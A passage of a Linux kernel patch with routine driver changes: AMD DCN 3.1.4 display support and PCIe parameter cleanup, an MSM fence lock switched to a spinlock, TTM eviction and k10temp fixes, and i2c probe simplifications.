+ void dmub_dcn31_set_gpint(struct dmub_srv *dmub,
+ 			  union dmub_gpint_data_register reg);
+ 
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn314.c b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn314.c
+new file mode 100644
+index 0000000000000..f161aeb7e7c4a
+--- /dev/null
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn314.c
+@@ -0,0 +1,67 @@
++/*
++ * Copyright 2021 Advanced Micro Devices, Inc.
++ *
++ * Permission is hereby granted, free of charge, to any person obtaining a
++ * copy of this software and associated documentation files (the "Software"),
++ * to deal in the Software without restriction, including without limitation
++ * the rights to use, copy, modify, merge, publish, distribute, sublicense,
++ * and/or sell copies of the Software, and to permit persons to whom the
++ * Software is furnished to do so, subject to the following conditions:
++ *
++ * The above copyright notice and this permission notice shall be included in
++ * all copies or substantial portions of the Software.
++ *
++ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
++ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
++ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.  IN NO EVENT SHALL
++ * THE COPYRIGHT HOLDER(S) OR AUTHOR(S) BE LIABLE FOR ANY CLAIM, DAMAGES OR
++ * OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
++ * ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
++ * OTHER DEALINGS IN THE SOFTWARE.
++ *
++ * Authors: AMD
++ *
++ */
++
++#include "../dmub_srv.h"
++#include "dmub_reg.h"
++#include "dmub_dcn314.h"
++
++#include "dcn/dcn_3_1_4_offset.h"
++#include "dcn/dcn_3_1_4_sh_mask.h"
++
++#define DCN_BASE__INST0_SEG0                       0x00000012
++#define DCN_BASE__INST0_SEG1                       0x000000C0
++#define DCN_BASE__INST0_SEG2                       0x000034C0
++#define DCN_BASE__INST0_SEG3                       0x00009000
++#define DCN_BASE__INST0_SEG4                       0x02403C00
++#define DCN_BASE__INST0_SEG5                       0
++
++#define BASE_INNER(seg) DCN_BASE__INST0_SEG##seg
++#define CTX dmub
++#define REGS dmub->regs_dcn31
++#define REG_OFFSET_EXP(reg_name) (BASE(reg##reg_name##_BASE_IDX) + reg##reg_name)
++
++/* Registers. */
++
++const struct dmub_srv_dcn31_regs dmub_srv_dcn314_regs = {
++#define DMUB_SR(reg) REG_OFFSET_EXP(reg),
++	{
++		DMUB_DCN31_REGS()
++		DMCUB_INTERNAL_REGS()
++	},
++#undef DMUB_SR
++
++#define DMUB_SF(reg, field) FD_MASK(reg, field),
++	{ DMUB_DCN31_FIELDS() },
++#undef DMUB_SF
++
++#define DMUB_SF(reg, field) FD_SHIFT(reg, field),
++	{ DMUB_DCN31_FIELDS() },
++#undef DMUB_SF
++};
++
++bool dmub_dcn314_is_psrsu_supported(struct dmub_srv *dmub)
++{
++	return dmub->fw_version >= DMUB_FW_VERSION(8, 0, 16);
++}
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn314.h b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn314.h
+new file mode 100644
+index 0000000000000..f213bd82c9110
+--- /dev/null
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn314.h
+@@ -0,0 +1,35 @@
++/*
++ * Copyright 2021 Advanced Micro Devices, Inc.
++ *
++ * Permission is hereby granted, free of charge, to any person obtaining a
++ * copy of this software and associated documentation files (the "Software"),
++ * to deal in the Software without restriction, including without limitation
++ * the rights to use, copy, modify, merge, publish, distribute, sublicense,
++ * and/or sell copies of the Software, and to permit persons to whom the
++ * Software is furnished to do so, subject to the following conditions:
++ *
++ * The above copyright notice and this permission notice shall be included in
++ * all copies or substantial portions of the Software.
++ *
++ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
++ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
++ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.  IN NO EVENT SHALL
++ * THE COPYRIGHT HOLDER(S) OR AUTHOR(S) BE LIABLE FOR ANY CLAIM, DAMAGES OR
++ * OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
++ * ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
++ * OTHER DEALINGS IN THE SOFTWARE.
++ *
++ * Authors: AMD
++ *
++ */
++
++#ifndef _DMUB_DCN314_H_
++#define _DMUB_DCN314_H_
++
++#include "dmub_dcn31.h"
++
++extern const struct dmub_srv_dcn31_regs dmub_srv_dcn314_regs;
++
++bool dmub_dcn314_is_psrsu_supported(struct dmub_srv *dmub);
++
++#endif /* _DMUB_DCN314_H_ */
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c b/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c
+index 92c18bfb98b3b..0dab22d794808 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c
+@@ -32,6 +32,7 @@
+ #include "dmub_dcn302.h"
+ #include "dmub_dcn303.h"
+ #include "dmub_dcn31.h"
++#include "dmub_dcn314.h"
+ #include "dmub_dcn315.h"
+ #include "dmub_dcn316.h"
+ #include "dmub_dcn32.h"
+@@ -226,12 +227,17 @@ static bool dmub_srv_hw_setup(struct dmub_srv *dmub, enum dmub_asic asic)
+ 	case DMUB_ASIC_DCN314:
+ 	case DMUB_ASIC_DCN315:
+ 	case DMUB_ASIC_DCN316:
+-		if (asic == DMUB_ASIC_DCN315)
++		if (asic == DMUB_ASIC_DCN314) {
++			dmub->regs_dcn31 = &dmub_srv_dcn314_regs;
++			funcs->is_psrsu_supported = dmub_dcn314_is_psrsu_supported;
++		} else if (asic == DMUB_ASIC_DCN315) {
+ 			dmub->regs_dcn31 = &dmub_srv_dcn315_regs;
+-		else if (asic == DMUB_ASIC_DCN316)
++		} else if (asic == DMUB_ASIC_DCN316) {
+ 			dmub->regs_dcn31 = &dmub_srv_dcn316_regs;
+-		else
++		} else {
+ 			dmub->regs_dcn31 = &dmub_srv_dcn31_regs;
++			funcs->is_psrsu_supported = dmub_dcn31_is_psrsu_supported;
++		}
+ 		funcs->reset = dmub_dcn31_reset;
+ 		funcs->reset_release = dmub_dcn31_reset_release;
+ 		funcs->backdoor_load = dmub_dcn31_backdoor_load;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+index 1b7d93709a352..31835d96deef9 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+@@ -2081,89 +2081,36 @@ static int sienna_cichlid_display_disable_memory_clock_switch(struct smu_context
+ 	return ret;
+ }
+ 
+-static void sienna_cichlid_get_override_pcie_settings(struct smu_context *smu,
+-						      uint32_t *gen_speed_override,
+-						      uint32_t *lane_width_override)
+-{
+-	struct amdgpu_device *adev = smu->adev;
+-
+-	*gen_speed_override = 0xff;
+-	*lane_width_override = 0xff;
+-
+-	switch (adev->pdev->device) {
+-	case 0x73A0:
+-	case 0x73A1:
+-	case 0x73A2:
+-	case 0x73A3:
+-	case 0x73AB:
+-	case 0x73AE:
+-		/* Bit 7:0: PCIE lane width, 1 to 7 corresponds is x1 to x32 */
+-		*lane_width_override = 6;
+-		break;
+-	case 0x73E0:
+-	case 0x73E1:
+-	case 0x73E3:
+-		*lane_width_override = 4;
+-		break;
+-	case 0x7420:
+-	case 0x7421:
+-	case 0x7422:
+-	case 0x7423:
+-	case 0x7424:
+-		*lane_width_override = 3;
+-		break;
+-	default:
+-		break;
+-	}
+-}
+-
+-#define MAX(a, b)	((a) > (b) ? (a) : (b))
+-
+ static int sienna_cichlid_update_pcie_parameters(struct smu_context *smu,
+ 					 uint32_t pcie_gen_cap,
+ 					 uint32_t pcie_width_cap)
+ {
+ 	struct smu_11_0_dpm_context *dpm_context = smu->smu_dpm.dpm_context;
+ 	struct smu_11_0_pcie_table *pcie_table = &dpm_context->dpm_tables.pcie_table;
+-	uint32_t gen_speed_override, lane_width_override;
+-	uint8_t *table_member1, *table_member2;
+-	uint32_t min_gen_speed, max_gen_speed;
+-	uint32_t min_lane_width, max_lane_width;
+-	uint32_t smu_pcie_arg;
++	u32 smu_pcie_arg;
+ 	int ret, i;
+ 
+-	GET_PPTABLE_MEMBER(PcieGenSpeed, &table_member1);
+-	GET_PPTABLE_MEMBER(PcieLaneCount, &table_member2);
+-
+-	sienna_cichlid_get_override_pcie_settings(smu,
+-						  &gen_speed_override,
+-						  &lane_width_override);
++	/* PCIE gen speed and lane width override */
++	if (!amdgpu_device_pcie_dynamic_switching_supported()) {
++		if (pcie_table->pcie_gen[NUM_LINK_LEVELS - 1] < pcie_gen_cap)
++			pcie_gen_cap = pcie_table->pcie_gen[NUM_LINK_LEVELS - 1];
+ 
+-	/* PCIE gen speed override */
+-	if (gen_speed_override != 0xff) {
+-		min_gen_speed = MIN(pcie_gen_cap, gen_speed_override);
+-		max_gen_speed = MIN(pcie_gen_cap, gen_speed_override);
+-	} else {
+-		min_gen_speed = MAX(0, table_member1[0]);
+-		max_gen_speed = MIN(pcie_gen_cap, table_member1[1]);
+-		min_gen_speed = min_gen_speed > max_gen_speed ?
+-				max_gen_speed : min_gen_speed;
+-	}
+-	pcie_table->pcie_gen[0] = min_gen_speed;
+-	pcie_table->pcie_gen[1] = max_gen_speed;
++		if (pcie_table->pcie_lane[NUM_LINK_LEVELS - 1] < pcie_width_cap)
++			pcie_width_cap = pcie_table->pcie_lane[NUM_LINK_LEVELS - 1];
+ 
+-	/* PCIE lane width override */
+-	if (lane_width_override != 0xff) {
+-		min_lane_width = MIN(pcie_width_cap, lane_width_override);
+-		max_lane_width = MIN(pcie_width_cap, lane_width_override);
++		/* Force all levels to use the same settings */
++		for (i = 0; i < NUM_LINK_LEVELS; i++) {
++			pcie_table->pcie_gen[i] = pcie_gen_cap;
++			pcie_table->pcie_lane[i] = pcie_width_cap;
++		}
+ 	} else {
+-		min_lane_width = MAX(1, table_member2[0]);
+-		max_lane_width = MIN(pcie_width_cap, table_member2[1]);
+-		min_lane_width = min_lane_width > max_lane_width ?
+-				 max_lane_width : min_lane_width;
++		for (i = 0; i < NUM_LINK_LEVELS; i++) {
++			if (pcie_table->pcie_gen[i] > pcie_gen_cap)
++				pcie_table->pcie_gen[i] = pcie_gen_cap;
++			if (pcie_table->pcie_lane[i] > pcie_width_cap)
++				pcie_table->pcie_lane[i] = pcie_width_cap;
++		}
+ 	}
+-	pcie_table->pcie_lane[0] = min_lane_width;
+-	pcie_table->pcie_lane[1] = max_lane_width;
+ 
+ 	for (i = 0; i < NUM_LINK_LEVELS; i++) {
+ 		smu_pcie_arg = (i << 16 |
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+index 2456f2a72defc..47fafb1fa6088 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+@@ -2490,25 +2490,6 @@ int smu_v13_0_mode1_reset(struct smu_context *smu)
+ 	return ret;
+ }
+ 
+-/*
+- * Intel hosts such as Raptor Lake and Sapphire Rapids don't support dynamic
+- * speed switching. Until we have confirmation from Intel that a specific host
+- * supports it, it's safer that we keep it disabled for all.
+- *
+- * https://edc.intel.com/content/www/us/en/design/products/platforms/details/raptor-lake-s/13th-generation-core-processors-datasheet-volume-1-of-2/005/pci-express-support/
+- * https://gitlab.freedesktop.org/drm/amd/-/issues/2663
+- */
+-static bool smu_v13_0_is_pcie_dynamic_switching_supported(void)
+-{
+-#if IS_ENABLED(CONFIG_X86)
+-	struct cpuinfo_x86 *c = &cpu_data(0);
+-
+-	if (c->x86_vendor == X86_VENDOR_INTEL)
+-		return false;
+-#endif
+-	return true;
+-}
+-
+ int smu_v13_0_update_pcie_parameters(struct smu_context *smu,
+ 				     uint32_t pcie_gen_cap,
+ 				     uint32_t pcie_width_cap)
+@@ -2520,7 +2501,7 @@ int smu_v13_0_update_pcie_parameters(struct smu_context *smu,
+ 	uint32_t smu_pcie_arg;
+ 	int ret, i;
+ 
+-	if (!smu_v13_0_is_pcie_dynamic_switching_supported()) {
++	if (!amdgpu_device_pcie_dynamic_switching_supported()) {
+ 		if (pcie_table->pcie_gen[num_of_levels - 1] < pcie_gen_cap)
+ 			pcie_gen_cap = pcie_table->pcie_gen[num_of_levels - 1];
+ 
+diff --git a/drivers/gpu/drm/drm_syncobj.c b/drivers/gpu/drm/drm_syncobj.c
+index 0c2be83605258..e592c5da70cee 100644
+--- a/drivers/gpu/drm/drm_syncobj.c
++++ b/drivers/gpu/drm/drm_syncobj.c
+@@ -353,10 +353,10 @@ EXPORT_SYMBOL(drm_syncobj_replace_fence);
+  */
+ static int drm_syncobj_assign_null_handle(struct drm_syncobj *syncobj)
+ {
+-	struct dma_fence *fence = dma_fence_allocate_private_stub();
++	struct dma_fence *fence = dma_fence_allocate_private_stub(ktime_get());
+ 
+-	if (IS_ERR(fence))
+-		return PTR_ERR(fence);
++	if (!fence)
++		return -ENOMEM;
+ 
+ 	drm_syncobj_replace_fence(syncobj, fence);
+ 	dma_fence_put(fence);
+diff --git a/drivers/gpu/drm/i915/display/intel_dpt.c b/drivers/gpu/drm/i915/display/intel_dpt.c
+index a3893aff38611..ea8a08b9c0b11 100644
+--- a/drivers/gpu/drm/i915/display/intel_dpt.c
++++ b/drivers/gpu/drm/i915/display/intel_dpt.c
+@@ -163,6 +163,8 @@ struct i915_vma *intel_dpt_pin(struct i915_address_space *vm)
+ 		i915_vma_get(vma);
+ 	}
+ 
++	dpt->obj->mm.dirty = true;
++
+ 	atomic_dec(&i915->gpu_error.pending_fb_pin);
+ 	intel_runtime_pm_put(&i915->runtime_pm, wakeref);
+ 
+@@ -258,7 +260,7 @@ intel_dpt_create(struct intel_framebuffer *fb)
+ 		dpt_obj = i915_gem_object_create_stolen(i915, size);
+ 	if (IS_ERR(dpt_obj) && !HAS_LMEM(i915)) {
+ 		drm_dbg_kms(&i915->drm, "Allocating dpt from smem\n");
+-		dpt_obj = i915_gem_object_create_internal(i915, size);
++		dpt_obj = i915_gem_object_create_shmem(i915, size);
+ 	}
+ 	if (IS_ERR(dpt_obj))
+ 		return ERR_CAST(dpt_obj);
+diff --git a/drivers/gpu/drm/i915/gem/selftests/huge_pages.c b/drivers/gpu/drm/i915/gem/selftests/huge_pages.c
+index 436598f19522c..02fe7ea8c5df8 100644
+--- a/drivers/gpu/drm/i915/gem/selftests/huge_pages.c
++++ b/drivers/gpu/drm/i915/gem/selftests/huge_pages.c
+@@ -1185,8 +1185,10 @@ static int igt_write_huge(struct drm_i915_private *i915,
+ 	 * times in succession a possibility by enlarging the permutation array.
+ 	 */
+ 	order = i915_random_order(count * count, &prng);
+-	if (!order)
+-		return -ENOMEM;
++	if (!order) {
++		err = -ENOMEM;
++		goto out;
++	}
+ 
+ 	max_page_size = rounddown_pow_of_two(obj->mm.page_sizes.sg);
+ 	max = div_u64(max - size, max_page_size);
+diff --git a/drivers/gpu/drm/msm/adreno/a5xx_gpu.c b/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
+index 0829eaf2cd4e8..895a0e9db1f09 100644
+--- a/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
+@@ -89,7 +89,7 @@ static void a5xx_submit_in_rb(struct msm_gpu *gpu, struct msm_gem_submit *submit
+ 			 * since we've already mapped it once in
+ 			 * submit_reloc()
+ 			 */
+-			if (WARN_ON(!ptr))
++			if (WARN_ON(IS_ERR_OR_NULL(ptr)))
+ 				return;
+ 
+ 			for (i = 0; i < dwords; i++) {
+diff --git a/drivers/gpu/drm/msm/adreno/a6xx_gpu_state.h b/drivers/gpu/drm/msm/adreno/a6xx_gpu_state.h
+index 2fb58b7098e4b..3bd2065a9d30e 100644
+--- a/drivers/gpu/drm/msm/adreno/a6xx_gpu_state.h
++++ b/drivers/gpu/drm/msm/adreno/a6xx_gpu_state.h
+@@ -200,7 +200,7 @@ static const struct a6xx_shader_block {
+ 	SHADER(A6XX_SP_LB_3_DATA, 0x800),
+ 	SHADER(A6XX_SP_LB_4_DATA, 0x800),
+ 	SHADER(A6XX_SP_LB_5_DATA, 0x200),
+-	SHADER(A6XX_SP_CB_BINDLESS_DATA, 0x2000),
++	SHADER(A6XX_SP_CB_BINDLESS_DATA, 0x800),
+ 	SHADER(A6XX_SP_CB_LEGACY_DATA, 0x280),
+ 	SHADER(A6XX_SP_UAV_DATA, 0x80),
+ 	SHADER(A6XX_SP_INST_TAG, 0x80),
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_core_perf.h b/drivers/gpu/drm/msm/disp/dpu1/dpu_core_perf.h
+index e3795995e1454..29bb8ee2bc266 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_core_perf.h
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_core_perf.h
+@@ -14,19 +14,6 @@
+ 
+ #define	DPU_PERF_DEFAULT_MAX_CORE_CLK_RATE	412500000
+ 
+-/**
+- * enum dpu_core_perf_data_bus_id - data bus identifier
+- * @DPU_CORE_PERF_DATA_BUS_ID_MNOC: DPU/MNOC data bus
+- * @DPU_CORE_PERF_DATA_BUS_ID_LLCC: MNOC/LLCC data bus
+- * @DPU_CORE_PERF_DATA_BUS_ID_EBI: LLCC/EBI data bus
+- */
+-enum dpu_core_perf_data_bus_id {
+-	DPU_CORE_PERF_DATA_BUS_ID_MNOC,
+-	DPU_CORE_PERF_DATA_BUS_ID_LLCC,
+-	DPU_CORE_PERF_DATA_BUS_ID_EBI,
+-	DPU_CORE_PERF_DATA_BUS_ID_MAX,
+-};
+-
+ /**
+  * struct dpu_core_perf_params - definition of performance parameters
+  * @max_per_pipe_ib: maximum instantaneous bandwidth request
+diff --git a/drivers/gpu/drm/msm/msm_drv.c b/drivers/gpu/drm/msm/msm_drv.c
+index ac3d1d492a48c..f982a827be7ca 100644
+--- a/drivers/gpu/drm/msm/msm_drv.c
++++ b/drivers/gpu/drm/msm/msm_drv.c
+@@ -932,13 +932,11 @@ static int wait_fence(struct msm_gpu_submitqueue *queue, uint32_t fence_id,
+ 	 * retired, so if the fence is not found it means there is nothing
+ 	 * to wait for
+ 	 */
+-	ret = mutex_lock_interruptible(&queue->idr_lock);
+-	if (ret)
+-		return ret;
++	spin_lock(&queue->idr_lock);
+ 	fence = idr_find(&queue->fence_idr, fence_id);
+ 	if (fence)
+ 		fence = dma_fence_get_rcu(fence);
+-	mutex_unlock(&queue->idr_lock);
++	spin_unlock(&queue->idr_lock);
+ 
+ 	if (!fence)
+ 		return 0;
+diff --git a/drivers/gpu/drm/msm/msm_gem_submit.c b/drivers/gpu/drm/msm/msm_gem_submit.c
+index d6162561141c5..c12a6ac2d3840 100644
+--- a/drivers/gpu/drm/msm/msm_gem_submit.c
++++ b/drivers/gpu/drm/msm/msm_gem_submit.c
+@@ -72,9 +72,9 @@ void __msm_gem_submit_destroy(struct kref *kref)
+ 	unsigned i;
+ 
+ 	if (submit->fence_id) {
+-		mutex_lock(&submit->queue->idr_lock);
++		spin_lock(&submit->queue->idr_lock);
+ 		idr_remove(&submit->queue->fence_idr, submit->fence_id);
+-		mutex_unlock(&submit->queue->idr_lock);
++		spin_unlock(&submit->queue->idr_lock);
+ 	}
+ 
+ 	dma_fence_put(submit->user_fence);
+@@ -866,7 +866,7 @@ int msm_ioctl_gem_submit(struct drm_device *dev, void *data,
+ 
+ 	submit->nr_cmds = i;
+ 
+-	mutex_lock(&queue->idr_lock);
++	spin_lock(&queue->idr_lock);
+ 
+ 	/*
+ 	 * If using userspace provided seqno fence, validate that the id
+@@ -875,8 +875,8 @@ int msm_ioctl_gem_submit(struct drm_device *dev, void *data,
+ 	 * after the job is armed
+ 	 */
+ 	if ((args->flags & MSM_SUBMIT_FENCE_SN_IN) &&
+-			idr_find(&queue->fence_idr, args->fence)) {
+-		mutex_unlock(&queue->idr_lock);
++			(!args->fence || idr_find(&queue->fence_idr, args->fence))) {
++		spin_unlock(&queue->idr_lock);
+ 		ret = -EINVAL;
+ 		goto out;
+ 	}
+@@ -910,7 +910,7 @@ int msm_ioctl_gem_submit(struct drm_device *dev, void *data,
+ 						    INT_MAX, GFP_KERNEL);
+ 	}
+ 
+-	mutex_unlock(&queue->idr_lock);
++	spin_unlock(&queue->idr_lock);
+ 
+ 	if (submit->fence_id < 0) {
+ 		ret = submit->fence_id;
+diff --git a/drivers/gpu/drm/msm/msm_gpu.h b/drivers/gpu/drm/msm/msm_gpu.h
+index 732295e256834..b39cd332751dc 100644
+--- a/drivers/gpu/drm/msm/msm_gpu.h
++++ b/drivers/gpu/drm/msm/msm_gpu.h
+@@ -500,7 +500,7 @@ struct msm_gpu_submitqueue {
+ 	struct msm_file_private *ctx;
+ 	struct list_head node;
+ 	struct idr fence_idr;
+-	struct mutex idr_lock;
++	struct spinlock idr_lock;
+ 	struct mutex lock;
+ 	struct kref ref;
+ 	struct drm_sched_entity *entity;
+diff --git a/drivers/gpu/drm/msm/msm_submitqueue.c b/drivers/gpu/drm/msm/msm_submitqueue.c
+index c6929e205b511..0e803125a325a 100644
+--- a/drivers/gpu/drm/msm/msm_submitqueue.c
++++ b/drivers/gpu/drm/msm/msm_submitqueue.c
+@@ -200,7 +200,7 @@ int msm_submitqueue_create(struct drm_device *drm, struct msm_file_private *ctx,
+ 		*id = queue->id;
+ 
+ 	idr_init(&queue->fence_idr);
+-	mutex_init(&queue->idr_lock);
++	spin_lock_init(&queue->idr_lock);
+ 	mutex_init(&queue->lock);
+ 
+ 	list_add_tail(&queue->node, &ctx->submitqueues);
+diff --git a/drivers/gpu/drm/ttm/ttm_bo.c b/drivers/gpu/drm/ttm/ttm_bo.c
+index f2c4e9037d6e0..f7aeeee6f5266 100644
+--- a/drivers/gpu/drm/ttm/ttm_bo.c
++++ b/drivers/gpu/drm/ttm/ttm_bo.c
+@@ -499,17 +499,18 @@ static int ttm_bo_evict(struct ttm_buffer_object *bo,
+ 		goto out;
+ 	}
+ 
+-bounce:
+-	ret = ttm_bo_handle_move_mem(bo, evict_mem, true, ctx, &hop);
+-	if (ret == -EMULTIHOP) {
++	do {
++		ret = ttm_bo_handle_move_mem(bo, evict_mem, true, ctx, &hop);
++		if (ret != -EMULTIHOP)
++			break;
++
+ 		ret = ttm_bo_bounce_temp_buffer(bo, &evict_mem, ctx, &hop);
+-		if (ret) {
++	} while (!ret);
++
++	if (ret) {
++		ttm_resource_free(bo, &evict_mem);
++		if (ret != -ERESTARTSYS && ret != -EINTR)
+ 			pr_err("Buffer eviction failed\n");
+-			ttm_resource_free(bo, &evict_mem);
+-			goto out;
+-		}
+-		/* try and move to final place now. */
+-		goto bounce;
+ 	}
+ out:
+ 	return ret;
+@@ -549,6 +550,12 @@ static bool ttm_bo_evict_swapout_allowable(struct ttm_buffer_object *bo,
+ {
+ 	bool ret = false;
+ 
++	if (bo->pin_count) {
++		*locked = false;
++		*busy = false;
++		return false;
++	}
++
+ 	if (bo->base.resv == ctx->resv) {
+ 		dma_resv_assert_held(bo->base.resv);
+ 		if (ctx->allow_res_evict)
+diff --git a/drivers/hwmon/k10temp.c b/drivers/hwmon/k10temp.c
+index 823d0ca1d6059..43aa955ec120d 100644
+--- a/drivers/hwmon/k10temp.c
++++ b/drivers/hwmon/k10temp.c
+@@ -77,6 +77,13 @@ static DEFINE_MUTEX(nb_smu_ind_mutex);
+ #define ZEN_CUR_TEMP_RANGE_SEL_MASK		BIT(19)
+ #define ZEN_CUR_TEMP_TJ_SEL_MASK		GENMASK(17, 16)
+ 
++/*
++ * AMD's Industrial processor 3255 supports temperatures from -40 to 105 degrees Celsius.
++ * Use the model name to identify 3255 CPUs and set a flag to display negative temperatures.
++ * Do not round negative Tctl or Tdie values off to zero if the flag is set.
++ */
++#define AMD_I3255_STR				"3255"
++
+ struct k10temp_data {
+ 	struct pci_dev *pdev;
+ 	void (*read_htcreg)(struct pci_dev *pdev, u32 *regval);
+@@ -86,6 +93,7 @@ struct k10temp_data {
+ 	u32 show_temp;
+ 	bool is_zen;
+ 	u32 ccd_offset;
++	bool disp_negative;
+ };
+ 
+ #define TCTL_BIT	0
+@@ -204,12 +212,12 @@ static int k10temp_read_temp(struct device *dev, u32 attr, int channel,
+ 		switch (channel) {
+ 		case 0:		/* Tctl */
+ 			*val = get_raw_temp(data);
+-			if (*val < 0)
++			if (*val < 0 && !data->disp_negative)
+ 				*val = 0;
+ 			break;
+ 		case 1:		/* Tdie */
+ 			*val = get_raw_temp(data) - data->temp_offset;
+-			if (*val < 0)
++			if (*val < 0 && !data->disp_negative)
+ 				*val = 0;
+ 			break;
+ 		case 2 ... 13:		/* Tccd{1-12} */
+@@ -405,6 +413,11 @@ static int k10temp_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	data->pdev = pdev;
+ 	data->show_temp |= BIT(TCTL_BIT);	/* Always show Tctl */
+ 
++	if (boot_cpu_data.x86 == 0x17 &&
++	    strstr(boot_cpu_data.x86_model_id, AMD_I3255_STR)) {
++		data->disp_negative = true;
++	}
++
+ 	if (boot_cpu_data.x86 == 0x15 &&
+ 	    ((boot_cpu_data.x86_model & 0xf0) == 0x60 ||
+ 	     (boot_cpu_data.x86_model & 0xf0) == 0x70)) {
+diff --git a/drivers/hwmon/nct7802.c b/drivers/hwmon/nct7802.c
+index a175f8283695e..e64c12d90a042 100644
+--- a/drivers/hwmon/nct7802.c
++++ b/drivers/hwmon/nct7802.c
+@@ -725,7 +725,7 @@ static umode_t nct7802_temp_is_visible(struct kobject *kobj,
+ 	if (index >= 38 && index < 46 && !(reg & 0x01))		/* PECI 0 */
+ 		return 0;
+ 
+-	if (index >= 0x46 && (!(reg & 0x02)))			/* PECI 1 */
++	if (index >= 46 && !(reg & 0x02))			/* PECI 1 */
+ 		return 0;
+ 
+ 	return attr->mode;
+diff --git a/drivers/i2c/busses/i2c-ibm_iic.c b/drivers/i2c/busses/i2c-ibm_iic.c
+index eeb80e34f9ad7..de3b609515e08 100644
+--- a/drivers/i2c/busses/i2c-ibm_iic.c
++++ b/drivers/i2c/busses/i2c-ibm_iic.c
+@@ -694,10 +694,8 @@ static int iic_probe(struct platform_device *ofdev)
+ 	int ret;
+ 
+ 	dev = kzalloc(sizeof(*dev), GFP_KERNEL);
+-	if (!dev) {
+-		dev_err(&ofdev->dev, "failed to allocate device data\n");
++	if (!dev)
+ 		return -ENOMEM;
+-	}
+ 
+ 	platform_set_drvdata(ofdev, dev);
+ 
+diff --git a/drivers/i2c/busses/i2c-nomadik.c b/drivers/i2c/busses/i2c-nomadik.c
+index a2d12a5b1c34c..9c5d66bd6dc1c 100644
+--- a/drivers/i2c/busses/i2c-nomadik.c
++++ b/drivers/i2c/busses/i2c-nomadik.c
+@@ -970,12 +970,10 @@ static int nmk_i2c_probe(struct amba_device *adev, const struct amba_id *id)
+ 	struct i2c_vendor_data *vendor = id->data;
+ 	u32 max_fifo_threshold = (vendor->fifodepth / 2) - 1;
+ 
+-	dev = devm_kzalloc(&adev->dev, sizeof(struct nmk_i2c_dev), GFP_KERNEL);
+-	if (!dev) {
+-		dev_err(&adev->dev, "cannot allocate memory\n");
+-		ret = -ENOMEM;
+-		goto err_no_mem;
+-	}
++	dev = devm_kzalloc(&adev->dev, sizeof(*dev), GFP_KERNEL);
++	if (!dev)
++		return -ENOMEM;
++
+ 	dev->vendor = vendor;
+ 	dev->adev = adev;
+ 	nmk_i2c_of_probe(np, dev);
+@@ -996,30 +994,21 @@ static int nmk_i2c_probe(struct amba_device *adev, const struct amba_id *id)
+ 
+ 	dev->virtbase = devm_ioremap(&adev->dev, adev->res.start,
+ 				resource_size(&adev->res));
+-	if (!dev->virtbase) {
+-		ret = -ENOMEM;
+-		goto err_no_mem;
+-	}
++	if (!dev->virtbase)
++		return -ENOMEM;
+ 
+ 	dev->irq = adev->irq[0];
+ 	ret = devm_request_irq(&adev->dev, dev->irq, i2c_irq_handler, 0,
+ 				DRIVER_NAME, dev);
+ 	if (ret) {
+ 		dev_err(&adev->dev, "cannot claim the irq %d\n", dev->irq);
+-		goto err_no_mem;
++		return ret;
+ 	}
+ 
+-	dev->clk = devm_clk_get(&adev->dev, NULL);
++	dev->clk = devm_clk_get_enabled(&adev->dev, NULL);
+ 	if (IS_ERR(dev->clk)) {
+-		dev_err(&adev->dev, "could not get i2c clock\n");
+-		ret = PTR_ERR(dev->clk);
+-		goto err_no_mem;
+-	}
+-
+-	ret = clk_prepare_enable(dev->clk);
+-	if (ret) {
+-		dev_err(&adev->dev, "can't prepare_enable clock\n");
+-		goto err_no_mem;
++		dev_err(&adev->dev, "could enable i2c clock\n");
++		return PTR_ERR(dev->clk);
+ 	}
+ 
+ 	init_hw(dev);
+@@ -1042,22 +1031,15 @@ static int nmk_i2c_probe(struct amba_device *adev, const struct amba_id *id)
+ 
+ 	ret = i2c_add_adapter(adap);
+ 	if (ret)
+-		goto err_no_adap;
++		return ret;
+ 
+ 	pm_runtime_put(&adev->dev);
+ 
+ 	return 0;
+-
+- err_no_adap:
+-	clk_disable_unprepare(dev->clk);
+- err_no_mem:
